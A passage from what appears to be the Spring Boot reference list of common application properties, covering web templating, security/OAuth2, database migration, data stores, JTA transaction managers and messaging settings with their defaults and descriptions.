Strategy.\n\tspring.resources.static-locations=classpath:\/META-INF\/resources\/,classpath:\/resources\/,classpath:\/static\/,classpath:\/public\/ # Locations of static resources.\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=false # Enable the connection status view for supported providers.\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.cache=true # Enable template caching.\n\tspring.thymeleaf.check-template-location=true # Check that the templates location exists.\n\tspring.thymeleaf.content-type=text\/html # Content-Type value.\n\tspring.thymeleaf.enabled=true # Enable MVC Thymeleaf view resolution.\n\tspring.thymeleaf.encoding=UTF-8 # Template encoding.\n\tspring.thymeleaf.excluded-view-names= # Comma-separated list of view names that should be excluded from resolution.\n\tspring.thymeleaf.mode=HTML5 # Template mode to be applied to templates. See also StandardTemplateModeHandlers.\n\tspring.thymeleaf.prefix=classpath:\/templates\/ # Prefix that gets prepended to view names when building a URL.\n\tspring.thymeleaf.suffix=.html # Suffix that gets appended to view names when building a URL.\n\tspring.thymeleaf.template-resolver-order= # Order of the template resolver in the chain.\n\tspring.thymeleaf.view-names= # Comma-separated list of view names that can be resolved.\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.cache= # Enable template caching.\n\tspring.velocity.charset=UTF-8 # Template encoding.\n\tspring.velocity.check-template-location=true # Check that the templates location exists.\n\tspring.velocity.content-type=text\/html # Content-Type value.\n\tspring.velocity.date-tool-attribute= # Name of the DateTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.enabled=true # Enable MVC view resolution for this technology.\n\tspring.velocity.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.velocity.number-tool-attribute= # Name of the NumberTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.velocity.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.velocity.properties.*= # Additional velocity properties.\n\tspring.velocity.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.velocity.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.velocity.suffix=.vm # Suffix that gets appended to view names when building a URL.\n\tspring.velocity.toolbox-config-location= # Velocity Toolbox config location. For instance `\/WEB-INF\/toolbox.xml`\n\tspring.velocity.view-names= # White list of view names that can be resolved.\n\n\n\t[[common-application-properties-security]]\n\t# ----------------------------------------\n\t# SECURITY PROPERTIES\n\t# ----------------------------------------\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.basic.authorize-mode=role # Security authorize mode to apply.\n\tsecurity.basic.enabled=true # Enable basic authentication.\n\tsecurity.basic.path=\/** # Comma-separated list of paths to secure.\n\tsecurity.basic.realm=Spring # HTTP basic realm name.\n\tsecurity.enable-csrf=false # Enable Cross Site Request Forgery support.\n\tsecurity.filter-order=0 # Security filter chain order.\n\tsecurity.filter-dispatcher-types=ASYNC, FORWARD, INCLUDE, REQUEST # Security filter chain dispatcher types.\n\tsecurity.headers.cache=true # Enable cache control HTTP headers.\n\tsecurity.headers.content-type=true # Enable \"X-Content-Type-Options\" header.\n\tsecurity.headers.frame=true # Enable \"X-Frame-Options\" header.\n\tsecurity.headers.hsts= # HTTP Strict Transport Security (HSTS) mode (none, domain, all).\n\tsecurity.headers.xss=true # Enable cross site scripting (XSS) protection.\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths.\n\tsecurity.require-ssl=false # Enable secure channel for all requests.\n\tsecurity.sessions=stateless # Session creation policy (always, never, if_required, stateless).\n\tsecurity.user.name=user # Default user name.\n\tsecurity.user.password= # Password for the default user name. A random password is logged on startup by default.\n\tsecurity.user.role=USER # Granted roles for the default user name.\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id.\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n\t# SECURITY OAUTH2 RESOURCES ({sc-spring-boot-autoconfigure}\/security\/oauth2\/resource\/ResourceServerProperties.{sc-ext}[ResourceServerProperties]\n\tsecurity.oauth2.resource.id= # Identifier of the resource.\n\tsecurity.oauth2.resource.jwt.key-uri= # The URI of the JWT token. Can be set if the value is not available and the key is public.\n\tsecurity.oauth2.resource.jwt.key-value= # The verification key of the JWT token. Can either be a symmetric secret or PEM-encoded RSA public key.\n\tsecurity.oauth2.resource.prefer-token-info=true # Use the token info, can be set to false to use the user info.\n\tsecurity.oauth2.resource.service-id=resource #\n\tsecurity.oauth2.resource.token-info-uri= # URI of the token decoding endpoint.\n\tsecurity.oauth2.resource.token-type= # The token type to send when using the userInfoUri.\n\tsecurity.oauth2.resource.user-info-uri= # URI of the user endpoint.\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n\tsecurity.oauth2.sso.login-path=\/login # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\n\t# ----------------------------------------\n\t# DATA PROPERTIES\n\t# ----------------------------------------\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.baseline-description= #\n\tflyway.baseline-version=1 # version to start migration\n\tflyway.baseline-on-migrate= #\n\tflyway.check-location=false # Check that migration scripts location exists.\n\tflyway.clean-on-validation-error= #\n\tflyway.enabled=true # Enable flyway.\n\tflyway.encoding= #\n\tflyway.ignore-failed-future-migration= #\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it.\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.out-of-order= #\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\tflyway.placeholder-prefix= #\n\tflyway.placeholder-replacement= #\n\tflyway.placeholder-suffix= #\n\tflyway.placeholders.*= #\n\tflyway.schemas= # schemas to update\n\tflyway.sql-migration-prefix=V #\n\tflyway.sql-migration-separator= #\n\tflyway.sql-migration-suffix=.sql #\n\tflyway.table= #\n\tflyway.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tflyway.user= # Login user of the database to migrate.\n\tflyway.validate-on-migrate= #\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml # Change log configuration path.\n\tliquibase.check-change-log-location=true # Check the change log location exists.\n\tliquibase.contexts= # Comma-separated list of runtime contexts to use.\n\tliquibase.default-schema= # Default database schema.\n\tliquibase.drop-first=false # Drop the database schema first.\n\tliquibase.enabled=true # Enable liquibase support.\n\tliquibase.labels= # Comma-separated list of runtime labels to use.\n\tliquibase.parameters.*= # Change log parameters.\n\tliquibase.password= # Login password of the database to migrate.\n\tliquibase.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tliquibase.user= # Login user of the database to migrate.\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true # Enable the PersistenceExceptionTranslationPostProcessor.\n\n\t# CASSANDRA ({sc-spring-boot-autoconfigure}\/cassandra\/CassandraProperties.{sc-ext}[CassandraProperties])\n\tspring.data.cassandra.cluster-name= # Name of the Cassandra cluster.\n\tspring.data.cassandra.compression= # Compression supported by the Cassandra binary protocol.\n\tspring.data.cassandra.connect-timeout-millis= # Socket option: connection time out.\n\tspring.data.cassandra.consistency-level= # Queries consistency level.\n\tspring.data.cassandra.contact-points=localhost # Comma-separated list of cluster node addresses.\n\tspring.data.cassandra.fetch-size= # Queries default fetch size.\n\tspring.data.cassandra.keyspace-name= # Keyspace name to use.\n\tspring.data.cassandra.load-balancing-policy= # Class name of the load balancing policy.\n\tspring.data.cassandra.port= # Port of the Cassandra server.\n\tspring.data.cassandra.password= # Login password of the server.\n\tspring.data.cassandra.read-timeout-millis= # Socket option: read time out.\n\tspring.data.cassandra.reconnection-policy= # Reconnection policy class.\n\tspring.data.cassandra.retry-policy= # Class name of the retry policy.\n\tspring.data.cassandra.serial-consistency-level= # Queries serial consistency level.\n\tspring.data.cassandra.ssl=false # Enable SSL support.\n\tspring.data.cassandra.username= # Login user of the server.\n\n\t# COUCHBASE ({sc-spring-boot-autoconfigure}\/couchbase\/CouchbaseProperties.{sc-ext}[CouchbaseProperties])\n\tspring.data.couchbase.auto-index=false # Automatically create views and indexes.\n spring.data.couchbase.bootstrap-hosts=localhost # Couchbase nodes (host or IP address) to bootstrap from.\n spring.data.couchbase.bucket.name= # Name of the bucket to connect to.\n spring.data.couchbase.bucket.password= # Password of the bucket.\n spring.data.couchbase.consistency=read-your-own-writes # Consistency to apply by default on generated queries.\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name=elasticsearch # Elasticsearch cluster name.\n\tspring.data.elasticsearch.cluster-nodes= # Comma-separated list of cluster node addresses. If not specified, starts a client node.\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client.\n\tspring.data.elasticsearch.repositories.enabled=true # Enable Elasticsearch repositories.\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.authentication-database= # Authentication database name.\n\tspring.data.mongodb.database=test # Database name.\n\tspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\n\tspring.data.mongodb.grid-fs-database= # GridFS database name.\n\tspring.data.mongodb.host=localhost # Mongo server host.\n\tspring.data.mongodb.password= # Login password of the mongo server.\n\tspring.data.mongodb.port=27017 # Mongo server port.\n\tspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\n\tspring.data.mongodb.username= # Login user of the mongo server.\n\n\t# DATA REST ({sc-spring-boot-autoconfigure}\/data\/rest\/RepositoryRestProperties.{sc-ext}[RepositoryRestProperties])\n\tspring.data.rest.base-path= # Base path to be used by Spring Data REST to expose repository resources.\n\tspring.data.rest.default-page-size= # Default size of pages.\n\tspring.data.rest.enable-enum-translation= # Enable enum value translation via the Spring Data REST default resource bundle.\n\tspring.data.rest.limit-param-name= # Name of the URL query string parameter that indicates how many results to return at once.\n\tspring.data.rest.max-page-size= # Maximum size of pages.\n\tspring.data.rest.page-param-name= # Name of the URL query string parameter that indicates what page to return.\n\tspring.data.rest.return-body-on-create= # Return a response body after creating an entity.\n\tspring.data.rest.return-body-on-update= # Return a response body after updating an entity.\n\tspring.data.rest.sort-param-name= # Name of the URL query string parameter that indicates what direction to sort results.\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\n\tspring.data.solr.repositories.enabled=true # Enable Solr repositories.\n\tspring.data.solr.zk-host= # ZooKeeper host address in the form HOST:PORT.\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.continue-on-error=false # Do not stop if an error occurs while initializing the database.\n\tspring.datasource.data= # Data (DML) script resource reference.\n\tspring.datasource.dbcp.*= # Commons DBCP specific settings\n\tspring.datasource.dbcp2.*= # Commons DBCP2 specific settings\n\tspring.datasource.driver-class-name= # Fully qualified name of the JDBC driver. Auto-detected based on the URL by default.\n\tspring.datasource.hikari.*= # Hikari specific settings\n\tspring.datasource.initialize=true # Populate the database using 'data.sql'.\n\tspring.datasource.jmx-enabled=false # Enable JMX support (if provided by the underlying pool).\n\tspring.datasource.jndi-name= # JNDI location of the datasource. Class, url, username & password are ignored when set.\n\tspring.datasource.name=testdb # Name of the datasource.\n\tspring.datasource.password= # Login password of the database.\n\tspring.datasource.platform=all # Platform to use in the schema resource (schema-${platform}.sql).\n\tspring.datasource.schema= # Schema (DDL) script resource reference.\n\tspring.datasource.separator=; # Statement separator in SQL initialization scripts.\n\tspring.datasource.sql-script-encoding= # SQL scripts encoding.\n\tspring.datasource.tomcat.*= # Tomcat datasource specific settings\n\tspring.datasource.type= # Fully qualified name of the connection pool implementation to use. By default, it is auto-detected from the classpath.\n\tspring.datasource.url= # JDBC url of the database.\n\tspring.datasource.username=\n\n\t# H2 Web Console ({sc-spring-boot-autoconfigure}\/h2\/H2ConsoleProperties.{sc-ext}[H2ConsoleProperties])\n\tspring.h2.console.enabled=false # Enable the console.\n\tspring.h2.console.path=\/h2-console # Path at which the console will be available.\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect= # SQLDialect JOOQ used when communicating with the configured datasource. For instance `POSTGRES`\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.data.jpa.repositories.enabled=true # Enable JPA repositories.\n\tspring.jpa.database= # Target database to operate on, auto-detected by default. Can be alternatively set using the \"databasePlatform\" property.\n\tspring.jpa.database-platform= # Name of the target database to operate on, auto-detected by default. Can be alternatively set using the \"Database\" enum.\n\tspring.jpa.generate-ddl=false # Initialize the schema on startup.\n\tspring.jpa.hibernate.ddl-auto= # DDL mode. This is actually a shortcut for the \"hibernate.hbm2ddl.auto\" property. Default to \"create-drop\" when using an embedded database, \"none\" otherwise.\n\tspring.jpa.hibernate.naming-strategy= # Naming strategy fully qualified name.\n\tspring.jpa.open-in-view=true # Register OpenEntityManagerInViewInterceptor. Binds a JPA EntityManager to the thread for the entire processing of the request.\n\tspring.jpa.properties.*= # Additional native properties to set on the JPA provider.\n\tspring.jpa.show-sql=false # Enable logging of SQL statements.\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.enabled=true # Enable JTA support.\n spring.jta.log-dir= # Transaction logs directory.\n spring.jta.transaction-manager-id= # Transaction manager unique identifier.\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session.\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired.\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool.\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.properties.checkpoint-interval=500 # Interval between checkpoints.\n\tspring.jta.atomikos.properties.console-file-count=1 # Number of debug logs files that can be created.\n\tspring.jta.atomikos.properties.console-file-limit=-1 # How many bytes can be stored at most in debug logs files.\n\tspring.jta.atomikos.properties.console-file-name=tm.out # Debug logs file name.\n\tspring.jta.atomikos.properties.console-log-level= # Console log level.\n\tspring.jta.atomikos.properties.default-jta-timeout=10000 # Default timeout for JTA transactions.\n\tspring.jta.atomikos.properties.enable-logging=true # Enable disk logging.\n\tspring.jta.atomikos.properties.force-shutdown-on-vm-exit=false # Specify if a VM shutdown should trigger forced shutdown of the transaction core.\n\tspring.jta.atomikos.properties.log-base-dir= # Directory in which the log files should be stored.\n\tspring.jta.atomikos.properties.log-base-name=tmlog # Transactions log file base name.\n\tspring.jta.atomikos.properties.max-actives=50 # Maximum number of active transactions.\n\tspring.jta.atomikos.properties.max-timeout=300000 # Maximum timeout (in milliseconds) that can be allowed for transactions.\n\tspring.jta.atomikos.properties.output-dir= # Directory in which to store the debug log files.\n\tspring.jta.atomikos.properties.serial-jta-transactions=true # Specify if sub-transactions should be joined when possible.\n\tspring.jta.atomikos.properties.service= # Transaction manager implementation that should be started.\n\tspring.jta.atomikos.properties.threaded-two-phase-commit=true # Use different (and concurrent) threads for two-phase commit on the participating resources.\n\tspring.jta.atomikos.properties.transaction-manager-unique-name= # Transaction manager's unique name.\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired.\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached.\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider.\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool.\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider.\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired.\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections.\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool.\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections.\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions.\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache.\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.properties.allow-multiple-lrc=false # Allow multiple LRC resources to be enlisted into the same transaction.\n spring.jta.bitronix.properties.asynchronous2-pc=false # Enable asynchronously execution of two phase commit.\n spring.jta.bitronix.properties.background-recovery-interval-seconds=60 # Interval in seconds at which to run the recovery process in the background.\n spring.jta.bitronix.properties.current-node-only-recovery=true # Recover only the current node.\n spring.jta.bitronix.properties.debug-zero-resource-transaction=false # Log the creation and commit call stacks of transactions executed without a single enlisted resource.\n spring.jta.bitronix.properties.default-transaction-timeout=60 # Default transaction timeout in seconds.\n spring.jta.bitronix.properties.disable-jmx=false # Enable JMX support.\n spring.jta.bitronix.properties.exception-analyzer= # Set the fully qualified name of the exception analyzer implementation to use.\n spring.jta.bitronix.properties.filter-log-status=false # Enable filtering of logs so that only mandatory logs are written.\n spring.jta.bitronix.properties.force-batching-enabled=true # Set if disk forces are batched.\n spring.jta.bitronix.properties.forced-write-enabled=true # Set if logs are forced to disk.\n spring.jta.bitronix.properties.graceful-shutdown-interval=60 # Maximum amount of seconds the TM will wait for transactions to get done before aborting them at shutdown time.\n spring.jta.bitronix.properties.jndi-transaction-synchronization-registry-name= # JNDI name of the TransactionSynchronizationRegistry.\n spring.jta.bitronix.properties.jndi-user-transaction-name= # JNDI name of the UserTransaction.\n spring.jta.bitronix.properties.journal=disk # Name of the journal. Can be 'disk', 'null' or a class name.\n spring.jta.bitronix.properties.log-part1-filename=btm1.tlog # Name of the first fragment of the journal.\n spring.jta.bitronix.properties.log-part2-filename=btm2.tlog # Name of the second fragment of the journal.\n spring.jta.bitronix.properties.max-log-size-in-mb=2 # Maximum size in megabytes of the journal fragments.\n spring.jta.bitronix.properties.resource-configuration-filename= # ResourceLoader configuration file name.\n spring.jta.bitronix.properties.server-id= # ASCII ID that must uniquely identify this TM instance. Default to the machine's IP address.\n spring.jta.bitronix.properties.skip-corrupted-logs=false # Skip corrupted transactions log entries.\n spring.jta.bitronix.properties.warn-about-zero-resource-transaction=true # Log a warning for transactions executed without a single enlisted resource.\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.features=SYNC_DELAY # Comma-separated list of features to enable.\n\tspring.mongodb.embedded.version=2.6.10 # Version of Mongo to use.\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database=0 # Database index used by the connection factory.\n\tspring.redis.host=localhost # Redis server host.\n\tspring.redis.password= # Login password of the redis server.\n\tspring.redis.pool.max-active=8 # Max number of connections that can be allocated by the pool at a given time. Use a negative value for no limit.\n\tspring.redis.pool.max-idle=8 # Max number of \"idle\" connections in the pool. Use a negative value to indicate an unlimited number of idle connections.\n\tspring.redis.pool.max-wait=-1 # Maximum amount of time (in milliseconds) a connection allocation should block before throwing an exception when the pool is exhausted. Use a negative value to block indefinitely.\n\tspring.redis.pool.min-idle=0 # Target for the minimum number of idle connections to maintain in the pool. This setting only has an effect if it is positive.\n\tspring.redis.port=6379 # Redis server port.\n\tspring.redis.sentinel.master= # Name of Redis server.\n\tspring.redis.sentinel.nodes= # Comma-separated list of host:port pairs.\n\tspring.redis.timeout=0 # Connection timeout in milliseconds.\n\n\n\t# ----------------------------------------\n\t# INTEGRATION PROPERTIES\n\t# ----------------------------------------\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url= # URL of the ActiveMQ broker. Auto-generated by default. For instance `tcp:\/\/localhost:61616`\n\tspring.activemq.in-memory=true # Specify if the default broker URL should be in memory. Ignored if an explicit broker has been specified.\n\tspring.activemq.password= # Login password of the broker.\n\tspring.activemq.pooled=false # Specify if a PooledConnectionFactory should be created instead of a regular ConnectionFactory.\n\tspring.activemq.user= # Login user of the broker.\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.artemis.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.artemis.embedded.enabled=true # Enable embedded mode if the Artemis server APIs are available.\n\tspring.artemis.embedded.persistent=false # Enable persistent store.\n\tspring.artemis.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.artemis.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.artemis.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.artemis.host=localhost # Artemis broker host.\n\tspring.artemis.mode= # Artemis deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.artemis.port=61616 # Artemis broker port.\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.initializer.enabled=true # Create the required batch tables on startup if necessary.\n\tspring.batch.job.enabled=true # Execute all Spring Batch jobs in the context on startup.\n\tspring.batch.job.names= # Comma-separated list of job names to execute on startup (For instance `job1,job2`). By default, all Jobs found in the context are 